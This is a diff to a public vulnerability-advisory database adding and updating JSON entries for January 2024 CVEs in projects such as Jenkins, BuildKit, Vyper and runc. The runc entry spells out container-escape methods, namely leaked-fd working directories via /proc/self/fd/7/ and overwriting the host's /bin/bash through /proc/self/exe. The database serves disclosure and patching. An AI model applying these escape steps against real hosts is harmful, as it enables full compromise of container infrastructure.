[ + { + "package": { + "ecosystem": "Packagist", + "name": "superbig/craft-audit" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.0.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-36259" + }, + { + "type": "WEB", + "url": "https://github.com/sjelfull/craft-audit/pull/73" + }, + { + "type": "WEB", + "url": "https://github.com/sjelfull/craft-audit/commit/c2888aa48457f24696ac0a2ba4f54f39e5c672ed" + }, + { + "type": "PACKAGE", + "url": "https://github.com/sjelfull/craft-audit" + }, + { + "type": "WEB", + "url": "https://www.linkedin.com/pulse/threat-briefing-craftcms-amrcybersecurity-emi0e/?trackingId=E75GttWvQp6gfvPiJDDUBA%3D%3D" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T18:42:40Z", + "nvd_published_at": "2024-01-30T09:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-v9wr-2xrg-v7w8/GHSA-v9wr-2xrg-v7w8.json b/advisories/github-reviewed/2024/01/GHSA-v9wr-2xrg-v7w8/GHSA-v9wr-2xrg-v7w8.json index b9f1cd47f5220..b4478cd8cd661 100644 --- a/advisories/github-reviewed/2024/01/GHSA-v9wr-2xrg-v7w8/GHSA-v9wr-2xrg-v7w8.json +++ b/advisories/github-reviewed/2024/01/GHSA-v9wr-2xrg-v7w8/GHSA-v9wr-2xrg-v7w8.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-v9wr-2xrg-v7w8", - "modified": "2024-01-23T20:11:27Z", + "modified": "2024-01-30T16:11:44Z", "published": "2024-01-23T18:31:11Z", "aliases": [ "CVE-2024-22490" @@ -9,7 +9,10 @@ "summary": "Cross-site Scripting in beetl-bbs", "details": "Cross Site Scripting (XSS) vulnerability in beetl-bbs 2.0 allows attackers to run arbitrary code via the /index keyword parameter.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ { diff --git a/advisories/github-reviewed/2024/01/GHSA-vm5m-qmrx-fw8w/GHSA-vm5m-qmrx-fw8w.json b/advisories/github-reviewed/2024/01/GHSA-vm5m-qmrx-fw8w/GHSA-vm5m-qmrx-fw8w.json index 11dccbd57a32d..d3c0d8c483af8 100644 --- a/advisories/github-reviewed/2024/01/GHSA-vm5m-qmrx-fw8w/GHSA-vm5m-qmrx-fw8w.json +++ b/advisories/github-reviewed/2024/01/GHSA-vm5m-qmrx-fw8w/GHSA-vm5m-qmrx-fw8w.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-vm5m-qmrx-fw8w", - "modified": "2024-01-24T21:01:04Z", + "modified": "2024-01-31T14:55:51Z", "published": "2024-01-24T15:30:30Z", "aliases": [ "CVE-2023-50944" @@ -9,7 +9,10 @@ "summary": "Apache Airflow: Bypass permission verification to read code of other dags", "details": "Apache Airflow, versions before 2.8.1, have a vulnerability that allows an authenticated user to access the source code of a DAG to which they don't have access. This vulnerability is considered low since it requires an authenticated user to exploit it. Users are recommended to upgrade to version 2.8.1, which fixes this issue.\n", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ { diff --git a/advisories/github-reviewed/2024/01/GHSA-vph5-2q33-7r9h/GHSA-vph5-2q33-7r9h.json b/advisories/github-reviewed/2024/01/GHSA-vph5-2q33-7r9h/GHSA-vph5-2q33-7r9h.json index 307403fbbd831..95ab55a3765da 100644 --- a/advisories/github-reviewed/2024/01/GHSA-vph5-2q33-7r9h/GHSA-vph5-2q33-7r9h.json +++ b/advisories/github-reviewed/2024/01/GHSA-vph5-2q33-7r9h/GHSA-vph5-2q33-7r9h.json @@ -1,15 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-vph5-2q33-7r9h", - "modified": "2024-01-24T21:45:58Z", + "modified": "2024-01-31T21:45:31Z", "published": "2024-01-24T18:31:02Z", "aliases": [ "CVE-2024-23899" ], "summary": "Arbitrary file read vulnerability in Git server Plugin can lead to RCE", - "details": "Jenkins Git server Plugin 99.va_0826a_b_cdfa_d and earlier does not disable a feature of its command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing attackers with Overall/Read permission to read content from arbitrary files on the Jenkins controller file system.", + "details": "Jenkins Git server Plugin uses the [args4j](https://github.com/kohsuke/args4j) library to parse command arguments and options on the Jenkins controller when processing Git commands received via SSH. This command parser has a feature that replaces an @ character followed by a file path in an argument with the file’s contents (`expandAtFiles`). This feature is enabled by default and Git server Plugin 99.va_0826a_b_cdfa_d and earlier does not disable it.\n\nThis allows attackers with Overall/Read permission to read the first two lines of arbitrary files on the Jenkins controller file system using the default character encoding of the Jenkins controller process.\n\nSee [SECURITY-3314](https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3314) for further information about the potential impact of being able to read files on the Jenkins controller, as well as the [limitations for reading binary files](https://www.jenkins.io/security/advisory/2024-01-24/#binary-files-note). Note that for this issue, unlike SECURITY-3314, attackers need Overall/Read permission.\n\n## Fix Description\nGit server Plugin 99.101.v720e86326c09 disables the command parser feature that replaces an @ character followed by a file path in an argument with the file’s contents for CLI commands.\n\n## Workaround\nNavigate to Manage Jenkins » Security and ensure that the SSHD Port setting in the SSH Server section is set to Disable. This disables access to Git repositories hosted by Jenkins (and the Jenkins CLI) via SSH.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ { @@ -41,6 +44,10 @@ "type": "WEB", "url": "https://github.com/jenkinsci/git-server-plugin/commit/068ac7cc2574882ef9f5a486e001228a71d881ad" }, + { + "type": "PACKAGE", + "url": "https://github.com/jenkinsci/git-server-plugin" + }, { "type": "WEB", "url": "https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3319" diff --git a/advisories/github-reviewed/2024/01/GHSA-vvh2-82c7-ppfg/GHSA-vvh2-82c7-ppfg.json b/advisories/github-reviewed/2024/01/GHSA-vvh2-82c7-ppfg/GHSA-vvh2-82c7-ppfg.json new file mode 100644 index 0000000000000..01ddc6c0178f1 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-vvh2-82c7-ppfg/GHSA-vvh2-82c7-ppfg.json @@ -0,0 +1,77 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vvh2-82c7-ppfg", + "modified": "2024-01-30T18:43:05Z", + "published": "2024-01-30T06:30:23Z", + "aliases": [ + "CVE-2024-21488" + ], + "summary": "network Arbitrary Command Injection vulnerability", + "details": "Versions of the package network before 0.7.0 are vulnerable to Arbitrary Command Injection due to use of the `child_process` exec function without input sanitization. If (attacker-controlled) user input is given to the `mac_address_for` function of the package, it is possible for an attacker to execute arbitrary commands on the operating system that this package is being run on.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "network" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.7.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21488" + }, + { + "type": "WEB", + "url": "https://github.com/tomas/network/commit/5599ed6d6ff1571a5ccadea775430c131f381de7" + }, + { + "type": "WEB", + "url": "https://github.com/tomas/network/commit/6ec8713580938ab4666df2f2d0f3399891ed2ad7" + }, + { + "type": "WEB", + "url": "https://github.com/tomas/network/commit/72c523265940fe279eb0050d441522628f8988e5" + }, + { + "type": "WEB", + "url": "https://gist.github.com/icemonster/282ab98fb68fc22aac7c576538f6369c" + }, + { + "type": "PACKAGE", + "url": "https://github.com/tomas/network" + }, + { + "type": "WEB", + "url": "https://security.snyk.io/vuln/SNYK-JS-NETWORK-6184371" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-77" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T18:43:05Z", + "nvd_published_at": "2024-01-30T05:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-w9h2-px87-74vx/GHSA-w9h2-px87-74vx.json b/advisories/github-reviewed/2024/01/GHSA-w9h2-px87-74vx/GHSA-w9h2-px87-74vx.json new file mode 100644 index 0000000000000..5ae6e98324ca0 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-w9h2-px87-74vx/GHSA-w9h2-px87-74vx.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w9h2-px87-74vx", + "modified": "2024-01-30T20:56:45Z", + "published": "2024-01-30T20:56:45Z", + "aliases": [ + "CVE-2024-21649" + ], + "summary": "vantage6 remote code execution vulnerability", + "details": "### Impact\nAuthenticated users could inject code into algorithm environment variables\n\n### Workarounds\nNo ", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "vantage6" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.2.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/vantage6/vantage6/security/advisories/GHSA-w9h2-px87-74vx" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21649" + }, + { + "type": "WEB", + "url": "https://github.com/vantage6/vantage6/commit/eac19db737145d3ca987adf037a454fae0790ddd" + }, + { + "type": "PACKAGE", + "url": "https://github.com/vantage6/vantage6" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T20:56:45Z", + "nvd_published_at": "2024-01-30T16:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-wpxw-5xfm-x22v/GHSA-wpxw-5xfm-x22v.json b/advisories/github-reviewed/2024/01/GHSA-wpxw-5xfm-x22v/GHSA-wpxw-5xfm-x22v.json new file mode 100644 index 0000000000000..57245b9775b98 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-wpxw-5xfm-x22v/GHSA-wpxw-5xfm-x22v.json @@ -0,0 +1,73 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wpxw-5xfm-x22v", + "modified": "2024-02-06T19:47:14Z", + "published": "2024-01-29T21:30:27Z", + "aliases": [ + "CVE-2023-51842" + ], + "summary": "MeshCentral algorithm-downgrade issue", + "details": "An algorithm-downgrade issue was discovered in Ylianst MeshCentral 1.1.16.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "meshcentral" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.1.17" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51842" + }, + { + "type": "WEB", + "url": "https://github.com/Ylianst/MeshCentral/commit/a5efc5e899b8809293b297df045cff5ec0eb448b" + }, + { + "type": "PACKAGE", + "url": "https://github.com/Ylianst/MeshCentral" + }, + { + "type": "WEB", + "url": "https://github.com/Ylianst/MeshCentral/tree/master" + }, + { + "type": "WEB", + "url": "https://github.com/tianjk99/Cryptographic-Misuses/blob/main/Bug_MeshCentral.md" + }, + { + "type": "WEB", + "url": "https://github.com/tianjk99/Cryptographic-Misuses/blob/main/CVE-2023-51842.md" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-29T22:28:55Z", + "nvd_published_at": "2024-01-29T20:15:15Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-wr2v-9rpq-c35q/GHSA-wr2v-9rpq-c35q.json b/advisories/github-reviewed/2024/01/GHSA-wr2v-9rpq-c35q/GHSA-wr2v-9rpq-c35q.json new file mode 100644 index 0000000000000..e80ec41d8bfb9 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-wr2v-9rpq-c35q/GHSA-wr2v-9rpq-c35q.json @@ -0,0 +1,88 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wr2v-9rpq-c35q", + "modified": "2024-01-31T00:21:56Z", + "published": "2024-01-31T00:21:56Z", + "aliases": [ + "CVE-2020-15136" + ], + "summary": "Etcd Gateway TLS authentication only applies to endpoints detected in DNS SRV records", + "details": "### Vulnerability type\nCryptography\n\n### Workarounds\nRefer to the [gateway documentation](https://github.com/etcd-io/etcd/blob/master/Documentation/op-guide/gateway.md). The vulnerability was spotted due to unclear documentation of how the gateway handles endpoints validation.\n\n### Detail\nWhen starting a gateway, TLS authentication will only be attempted on endpoints identified in DNS SRV records for a given domain, which occurs in the discoverEndpoints function. No authentication is performed against endpoints provided in the --endpoints flag. The auditors has noted that appropriate documentation of this validation functionality plus deprecation of this misleading functionality is an acceptable path forward.\n \n### References\nFind out more on this vulnerability in the [security audit report](https://github.com/etcd-io/etcd/blob/master/security/SECURITY_AUDIT.pdf)\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Contact the [etcd security committee](https://github.com/etcd-io/etcd/blob/master/security/security-release-process.md#product-security-committee-psc)", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "go.etcd.io/etcd" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.4.0-rc.0" + }, + { + "fixed": "3.4.10" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.4.9" + } + }, + { + "package": { + "ecosystem": "Go", + "name": "go.etcd.io/etcd" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.3.23" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/etcd-io/etcd/security/advisories/GHSA-wr2v-9rpq-c35q" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-15136" + }, + { + "type": "WEB", + "url": "https://github.com/etcd-io/etcd/blob/master/Documentation/op-guide/gateway.md" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/L6B6R43Y7M3DCHWK3L3UVGE2K6WWECMP/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287", + "CWE-306" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-31T00:21:56Z", + "nvd_published_at": "2020-08-06T23:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-wr6v-9f75-vh2g/GHSA-wr6v-9f75-vh2g.json b/advisories/github-reviewed/2024/01/GHSA-wr6v-9f75-vh2g/GHSA-wr6v-9f75-vh2g.json new file mode 100644 index 0000000000000..b4af317e10143 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-wr6v-9f75-vh2g/GHSA-wr6v-9f75-vh2g.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wr6v-9f75-vh2g", + "modified": "2024-02-01T17:48:40Z", + "published": "2024-01-31T22:43:20Z", + "aliases": [ + "CVE-2024-23653" + ], + "summary": "Buildkit's interactive containers API does not validate entitlements check", + "details": "### Impact\nIn addition to running containers as build steps, BuildKit also provides APIs for running interactive containers based on built images. It was possible to use these APIs to ask BuildKit to run a container with elevated privileges. Normally, running such containers is only allowed if special `security.insecure` entitlement is enabled both by buildkitd configuration and allowed by the user initializing the build request.\n\n### Patches\nThe issue has been fixed in v0.12.5 .\n\n### Workarounds\nAvoid using BuildKit frontends from untrusted sources. A frontend image is usually specified as the `#syntax` line on your Dockerfile, or with `--frontend` flag when using `buildctl build` command.\n\n### References\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/moby/buildkit" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.12.5" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/moby/buildkit/security/advisories/GHSA-wr6v-9f75-vh2g" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23653" + }, + { + "type": "WEB", + "url": "https://github.com/moby/buildkit/pull/4602" + }, + { + "type": "PACKAGE", + "url": "https://github.com/moby/buildkit" + }, + { + "type": "WEB", + "url": "https://github.com/moby/buildkit/releases/tag/v0.12.5" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-863" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2024-01-31T22:43:20Z", + "nvd_published_at": "2024-01-31T22:15:54Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-x22x-5pp9-8v7f/GHSA-x22x-5pp9-8v7f.json b/advisories/github-reviewed/2024/01/GHSA-x22x-5pp9-8v7f/GHSA-x22x-5pp9-8v7f.json index f2e063caafb04..230f2fd92dd29 100644 --- a/advisories/github-reviewed/2024/01/GHSA-x22x-5pp9-8v7f/GHSA-x22x-5pp9-8v7f.json +++ b/advisories/github-reviewed/2024/01/GHSA-x22x-5pp9-8v7f/GHSA-x22x-5pp9-8v7f.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-x22x-5pp9-8v7f", - "modified": "2024-01-24T21:51:55Z", + "modified": "2024-01-29T21:54:26Z", "published": "2024-01-24T18:31:02Z", "aliases": [ "CVE-2024-23905" @@ -9,7 +9,10 @@ "summary": "Content-Security-Policy disabled by Red Hat Dependency Analytics Jenkins Plugin", "details": "Jenkins sets the Content-Security-Policy header to static files served by Jenkins (specifically DirectoryBrowserSupport), such as workspaces, /userContent, or archived artifacts, unless a Resource Root URL is specified.\n\nRed Hat Dependency Analytics Plugin 0.7.1 and earlier globally disables the Content-Security-Policy header for static files served by Jenkins whenever the 'Invoke Red Hat Dependency Analytics (RHDA)' build step is executed. This allows cross-site scripting (XSS) attacks by users with the ability to control files in workspaces, archived artifacts, etc.\n", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ { diff --git a/advisories/github-reviewed/2024/01/GHSA-x2c2-q32w-4w6m/GHSA-x2c2-q32w-4w6m.json b/advisories/github-reviewed/2024/01/GHSA-x2c2-q32w-4w6m/GHSA-x2c2-q32w-4w6m.json new file mode 100644 index 0000000000000..51b8f4128bec9 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-x2c2-q32w-4w6m/GHSA-x2c2-q32w-4w6m.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x2c2-q32w-4w6m", + "modified": "2024-01-30T21:34:11Z", + "published": "2024-01-30T18:42:28Z", + "aliases": [ + "CVE-2024-24567" + ], + "summary": "Vyper's raw_call `value=` kwargs not disabled for static and delegate calls", + "details": "### Summary\nVyper compiler allows passing a value in builtin `raw_call` even if the call is a `delegatecall` or a `staticcall`. But in the context of `delegatecall` and `staticcall` the handling of value is not possible due to the semantics of the respective opcodes, and vyper will silently ignore the `value=` argument.\n\nA contract search was performed and no vulnerable contracts were found in production.\n\n### Details\nThe IR for `raw_call` is built in the `RawCall` class:\nhttps://github.com/vyperlang/vyper/blob/9136169468f317a53b4e7448389aa315f90b95ba/vyper/builtins/functions.py#L1100\n\nHowever, the compiler doesn't validate that if either `delegatecall` or `staticall` are provided as kwargs, that `value` wasn't set. For example, the following compiles without errors:\n```python\nraw_call(self, call_data2, max_outsize=255, is_delegate_call=True, value=msg.value/2)\n```\n\n### Impact\nIf the semantics of the EVM are unknown to the developer, he could suspect that by specifying the `value` kwarg, exactly the given amount will be sent along to the target. However in fact, no `value` will be sent.\n\nHere is an example of an potentially problematic implementation of multicall utilizing the `raw_call` built-in:\n```python\nvalue_accumulator: uint256 = empty(uint256)\n results: DynArray[Result, max_value(uint8)] = []\n return_data: Bytes[max_value(uint8)] = b\"\"\n success: bool = empty(bool)\n for batch in data:\n msg_value: uint256 = batch.value\n value_accumulator = unsafe_add(value_accumulator, msg_value)\n if (batch.allow_failure == False):\n return_data = raw_call(self, batch.call_data, max_outsize=255, value=msg_value, is_delegate_call=True)\n success = True\n results.append(Result({success: success, return_data: return_data}))\n else:\n success, return_data = \\\n raw_call(self, batch.call_data, max_outsize=255, value=msg_value, is_delegate_call=True, revert_on_failure=False)\n results.append(Result({success: success, return_data: return_data}))\n assert msg.value == value_accumulator, \"Multicall: value mismatch\"\n return results\n```\n\n### Patches\n_Has the problem been patched? What versions should users upgrade to?_\n\n### Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\n\n### References\n_Are there any links users can visit to find out more?_\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "vyper" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "0.3.10" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/vyperlang/vyper/security/advisories/GHSA-x2c2-q32w-4w6m" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24567" + }, + { + "type": "PACKAGE", + "url": "https://github.com/vyperlang/vyper" + }, + { + "type": "WEB", + "url": "https://github.com/vyperlang/vyper/blob/9136169468f317a53b4e7448389aa315f90b95ba/vyper/builtins/functions.py#L1100" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-754" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T18:42:28Z", + "nvd_published_at": "2024-01-30T21:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-xq62-62c9-22mg/GHSA-xq62-62c9-22mg.json b/advisories/github-reviewed/2024/01/GHSA-xq62-62c9-22mg/GHSA-xq62-62c9-22mg.json deleted file mode 100644 index 4df8bee365c2a..0000000000000 --- a/advisories/github-reviewed/2024/01/GHSA-xq62-62c9-22mg/GHSA-xq62-62c9-22mg.json +++ /dev/null @@ -1,68 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-xq62-62c9-22mg", - "modified": "2024-01-11T15:43:15Z", - "published": "2024-01-11T15:43:15Z", - "aliases": [ - "CVE-2019-6342" - ], - "summary": "Drupal Improper Access Control", - "details": "An access bypass vulnerability exists when the experimental Workspaces module in Drupal 8 core is enabled. This can be mitigated by disabling the Workspaces module. It does not affect any release other than Drupal 8.7.4.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" - } - ], - "affected": [ - { - "package": { - "ecosystem": "Packagist", - "name": "drupal/core" - }, - "ranges": [ - { - "type": "ECOSYSTEM", - "events": [ - { - "introduced": "8.7.4" - }, - { - "fixed": "8.7.5" - } - ] - } - ], - "versions": [ - "8.7.4" - ] - } - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-6342" - }, - { - "type": "WEB", - "url": "https://github.com/drupal/core/commit/bac9bde22bb545ff72570d8a46055c6c6e70e7c5" - }, - { - "type": "PACKAGE", - "url": "https://github.com/drupal/core" - }, - { - "type": "WEB", - "url": "https://www.drupal.org/sa-core-2019-008" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-284" - ], - "severity": "CRITICAL", - "github_reviewed": true, - "github_reviewed_at": "2024-01-11T15:43:15Z", - "nvd_published_at": "2020-05-28T21:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-xr7r-f8xq-vfvv/GHSA-xr7r-f8xq-vfvv.json b/advisories/github-reviewed/2024/01/GHSA-xr7r-f8xq-vfvv/GHSA-xr7r-f8xq-vfvv.json new file mode 100644 index 0000000000000..ad45a14c121a9 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-xr7r-f8xq-vfvv/GHSA-xr7r-f8xq-vfvv.json @@ -0,0 +1,88 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xr7r-f8xq-vfvv", + "modified": "2024-02-02T16:35:22Z", + "published": "2024-01-31T22:44:08Z", + "aliases": [ + "CVE-2024-21626" + ], + "summary": "runc vulnerable to container breakout through process.cwd trickery and leaked fds", + "details": "### Impact\n\nIn runc 1.1.11 and earlier, due to an internal file descriptor leak, an attacker could cause a newly-spawned container process (from `runc exec`) to have a working directory in the host filesystem namespace, allowing for a container escape by giving access to the host filesystem (\"attack 2\"). The same attack could be used by a malicious image to allow a container process to gain access to the host filesystem through `runc run` (\"attack 1\"). Variants of attacks 1 and 2 could be also be used to overwrite semi-arbitrary host binaries, allowing for complete container escapes (\"attack 3a\" and \"attack 3b\").\n\nStrictly speaking, while attack 3a is the most severe from a CVSS perspective, attacks 2 and 3b are arguably more dangerous in practice because they allow for a breakout from inside a container as opposed to requiring a user execute a malicious image. The reason attacks 1 and 3a are scored higher is because being able to socially engineer users is treated as a given for UI:R vectors, despite attacks 2 and 3b requiring far more minimal user interaction (just reasonable `runc exec` operations on a container the attacker has access to). In any case, all four attacks can lead to full control of the host system.\n\n#### Attack 1: `process.cwd` \"mis-configuration\"\n\nIn runc 1.1.11 and earlier, several file descriptors were inadvertently leaked internally within runc into `runc init`, including a handle to the host's `/sys/fs/cgroup` (this leak was added in v1.0.0-rc93). If the container was configured to have `process.cwd` set to `/proc/self/fd/7/` (the actual fd can change depending on file opening order in `runc`), the resulting pid1 process will have a working directory in the host mount namespace and thus the spawned process can access the entire host filesystem. This alone is not an exploit against runc, however a malicious image could make any innocuous-looking non-`/` path a symlink to `/proc/self/fd/7/` and thus trick a user into starting a container whose binary has access to the host filesystem.\n\nFurthermore, prior to runc 1.1.12, runc also did not verify that the final working directory was inside the container's mount namespace after calling `chdir(2)` (as we have already joined the container namespace, it was incorrectly assumed there would be no way to chdir outside the container after `pivot_root(2)`).\n\nThe CVSS score for this attack is CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N (8.2, high severity).\n\nNote that this attack requires a privileged user to be tricked into running a malicious container image. It should be noted that when using higher-level runtimes (such as Docker or Kubernetes), this exploit can be considered critical as it can be done remotely by anyone with the rights to start a container image (and can be exploited from within Dockerfiles using `ONBUILD` in the case of Docker).\n\n#### Attack 2: `runc exec` container breakout\n\n(This is a modification of attack 1, constructed to allow for a process inside a container to break out.)\n\nThe same fd leak and lack of verification of the working directory in attack 1 also apply to `runc exec`. If a malicious process inside the container knows that some administrative process will call `runc exec` with the `--cwd` argument and a given path, in most cases they can replace that path with a symlink to `/proc/self/fd/7/`. Once the container process has executed the container binary, `PR_SET_DUMPABLE` protections no longer apply and the attacker can open `/proc/$exec_pid/cwd` to get access to the host filesystem.\n\n`runc exec` defaults to a cwd of `/` (which cannot be replaced with a symlink), so this attack depends on the attacker getting a user (or some administrative process) to use `--cwd` and figuring out what path the target working directory is. Note that if the target working directory is a parent of the program binary being executed, the attacker might be unable to replace the path with a symlink (the `execve` will fail in most cases, unless the host filesystem layout specifically matches the container layout in specific ways and the attacker knows which binary the `runc exec` is executing).\n\nThe CVSS score for this attack is CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N (7.2, high severity).\n\n#### Attacks 3a and 3b: `process.args` host binary overwrite attack\n\n(These are modifications of attacks 1 and 2, constructed to overwrite a host binary by using `execve` to bring a magic-link reference into the container.)\n\nAttacks 1 and 2 can be adapted to overwrite a host binary by using a path like `/proc/self/fd/7/../../../bin/bash` as the `process.args` binary argument, causing a host binary to be executed by a container process. The `/proc/$pid/exe` handle can then be used to overwrite the host binary, as seen in CVE-2019-5736 (note that the same `#!` trick can be used to avoid detection as an attacker). As the overwritten binary could be something like `/bin/bash`, as soon as a privileged user executes the target binary on the host, the attacker can pivot to gain full access to the host.\n\nFor the purposes of CVSS scoring:\n\n* Attack 3a is attack 1 but adapted to overwrite a host binary, where a malicious image is set up to execute `/proc/self/fd/7/../../../bin/bash` and run a shell script that overwrites `/proc/self/exe`, overwriting the host copy of `/bin/bash`. The CVSS score for this attack is CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H (8.6, high severity).\n* Attack 3b is attack 2 but adapted to overwrite a host binary, where the malicious container process overwrites all of the possible `runc exec` target binaries inside the container (such as `/bin/bash`) such that a host target binary is executed and then the container process opens `/proc/$pid/exe` to get access to the host binary and overwrite it. The CVSS score for this attack is CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H (8.2, high severity).\n\nAs mentioned in attack 1, while 3b is scored lower it is more dangerous in practice as it doesn't 